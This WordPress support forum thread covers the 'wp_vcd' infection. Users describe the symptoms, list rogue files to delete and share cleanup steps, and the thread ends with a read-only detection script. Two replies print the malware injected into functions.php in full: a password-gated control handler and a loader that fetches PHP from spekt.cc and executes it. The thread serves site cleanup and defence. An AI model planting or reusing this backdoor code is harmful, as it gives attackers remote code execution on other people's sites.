/tmp/theme_temp_setup what is this
-
hi , suddenly my wordpress error Parse error: syntax error, unexpected ‘<‘ in /tmp/theme_temp_setupb1fUKP on line 2
i found lots of files in /tmp with filename theme_temp_setupxxxx
and inside those files contained :
<?php
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
<html xmlns=”http://www.w3.org/1999/xhtml”>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=utf-8″/>
<title>www.verna.cc</title>
<meta name=”viewport” content=”width=device-width” />
</head>
<body>
</body>
</html>
am i hacked or ?
i can't find how to fix the problem since i don't know where the php files are located on my vps.
-
ok so i’ve been hacked!
find this in wp-includes with file name class.wp.php <– delete this!
next look into your functions.php remove all on top codes, and problem fixed!
don't forget to change password.
You need to start working your way through the resources on this page. I’d also suggest reviewing http://ottopress.com/2009/hacked-wordpress-backdoors/
Anything less will probably result in the hacker walking straight back into your site again.
Additional Resources:
Hardening WordPress
http://sitecheck.sucuri.net/scanner/
http://www.unmaskparasites.com/
encountered the same, file class.wp.php not. functions.php replaced by new but refuses to work
The instruction has approached, many thanks!
@benderoffspring I have the same problem.
Can you explain in detail the solve?
@ Uri70663
wp-include with the file name class.wp.php <- remove it!
file was not. reinstalled functions.php from the original theme and everything started
@benderoffspring thanks
Am I missing something obvious or are you still hacked? Someone or something has broken into your server and created a rogue file. You really need to consider looking at the sources Esmi posted.
1. Rename your all theme
2. Login your site
3. Active akismet plugin (free)
4. Install IP2Location Country Blocker — WordPress Plugins and selected -Block all countries except countries listed below.
5. Remove functions.php (all of your theme) top php following code & rename (old name) your theme, active your main theme
————————————————————————–
<?phpif (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ‘[redacted]’))
{
$div_code_name=”wp_vcd”;
switch ($_REQUEST[‘action’])
{case ‘change_domain’;
if (isset($_REQUEST[‘newdomain’]))
{if (!empty($_REQUEST[‘newdomain’]))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all(‘/\$tmpcontent = @file_get_contents\(“http:\/\/(.*)\/code4\.php/i’,$file,$matcholddomain))
{$file = preg_replace(‘/’.$matcholddomain[1][0].’/i’,$_REQUEST[‘newdomain’], $file);
@file_put_contents(__FILE__, $file);
print “true”;
}}
}
}
break;default: print “ERROR_WP_ACTION WP_V_CD WP_CD”;
}die(“”);
}if ( ! function_exists( ‘theme_temp_setup’ ) ) {
$path=$_SERVER[‘HTTP_HOST’].$_SERVER[REQUEST_URI];
if ( stripos($_SERVER[‘REQUEST_URI’], ‘wp-cron.php’) == false && stripos($_SERVER[‘REQUEST_URI’], ‘xmlrpc.php’) == false) {if($tmpcontent = @file_get_contents(“http://www.spekt.cc/code4.php?i=”.$path))
{function theme_temp_setup($phpCode) {
$tmpfname = tempnam(sys_get_temp_dir(), “theme_temp_setup”);
$handle = fopen($tmpfname, “w+”);
fwrite($handle, “<?php\n” . $phpCode);
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}extract(theme_temp_setup($tmpcontent));
}
}
}?>
———————————————————————-
@esmi @anevins yes im reviewing the link @esmi gave , thank you!
and also remove all /tmp files with name theme_temp_setup
@uri70663 @benderoffspring has made the point 😀
Hey guys, just an etiquette thing. Please don’t @ folks who are already in the thread. If they want to subscribe, they will. If they chose not to, then using the @ sends unwanted emails. Thanks…. and back to having so much un-hacking fun!
shakiltorj
Thanks, it’s work for me.
you can say what needs to be done to not repeat this type of attack again?
thanks
Some update
a. Rename your all theme
b. Login your site
c. Active akismet plugin (free)
d. Install IP2Location Country Blocker — WordPress Plugins and selected -Block all countries except countries listed below.
e. Go to wp-includes
Delete the following file
1. wp-feed
2. wp-vcd.php
3. class.wp.php
f. Remove functions.php (all of your theme) top php following code & rename (old name) your theme, active your main theme
————————————————————————–
<?phpif (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ‘[redacted]’))
{
$div_code_name=”wp_vcd”;
switch ($_REQUEST[‘action’])
{case ‘change_domain’;
if (isset($_REQUEST[‘newdomain’]))
{if (!empty($_REQUEST[‘newdomain’]))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all(‘/\$tmpcontent = @file_get_contents\(“http:\/\/(.*)\/code4\.php/i’,$file,$matcholddomain))
{$file = preg_replace(‘/’.$matcholddomain[1][0].’/i’,$_REQUEST[‘newdomain’], $file);
@file_put_contents(__FILE__, $file);
print “true”;
}}
}
}
break;default: print “ERROR_WP_ACTION WP_V_CD WP_CD”;
}die(“”);
}if ( ! function_exists( ‘theme_temp_setup’ ) ) {
$path=$_SERVER[‘HTTP_HOST’].$_SERVER[REQUEST_URI];
if ( stripos($_SERVER[‘REQUEST_URI’], ‘wp-cron.php’) == false && stripos($_SERVER[‘REQUEST_URI’], ‘xmlrpc.php’) == false) {if($tmpcontent = @file_get_contents(“http://www.spekt.cc/code4.php?i=”.$path))
{function theme_temp_setup($phpCode) {
$tmpfname = tempnam(sys_get_temp_dir(), “theme_temp_setup”);
$handle = fopen($tmpfname, “w+”);
fwrite($handle, “<?php\n” . $phpCode);
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}extract(theme_temp_setup($tmpcontent));
}
}
}?>
———————————————————————
I was compromised with this as well.. Thanks for sharing your resolutions!
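The indicators reported in this thread (the file names under wp-includes, the marker strings in the code injected at the top of functions.php, and the theme_temp_setup* files in /tmp) can be checked with a read-only script. This is an added example, not something posted by a thread participant; the function name `scan_wp_vcd`, the output labels and the `wp-feed*` glob are assumptions.

```shell
#!/bin/sh
# Added example: read-only check for the indicators named in this thread.
# Prints one line per finding; deletes and modifies nothing.

scan_wp_vcd() {
    wp_root=$1          # WordPress install directory
    tmp_dir=${2:-/tmp}  # where the theme_temp_setupXXXX files appeared

    # 1. Rogue files the posters deleted from wp-includes.
    #    The thread lists "wp-feed" with no extension; the glob is an assumption.
    for f in "$wp_root/wp-includes/class.wp.php" \
             "$wp_root/wp-includes/wp-vcd.php" \
             "$wp_root"/wp-includes/wp-feed*; do
        if [ -e "$f" ]; then echo "ROGUE_FILE $f"; fi
    done

    # 2. Any theme's functions.php carrying marker strings from the posted code.
    themes="$wp_root/wp-content/themes"
    if [ -d "$themes" ]; then
        find "$themes" -type f -name functions.php \
            -exec grep -lE 'theme_temp_setup|wp_vcd|code4\.php' {} + 2>/dev/null |
            sed 's/^/INJECTED_THEME /'
    fi

    # 3. Leftover temp files written by the injected loader.
    for f in "$tmp_dir"/theme_temp_setup*; do
        if [ -f "$f" ]; then echo "TEMP_DROP $f"; fi
    done
    return 0
}

# Stand-alone use: ./scan.sh /path/to/wordpress [/tmp]  (path is a placeholder)
if [ "$#" -ge 1 ]; then scan_wp_vcd "$@"; fi
```

Empty output means only that these specific indicators are absent; it says nothing about how the site was entered or about other backdoors, which is what the resources linked earlier in the thread cover.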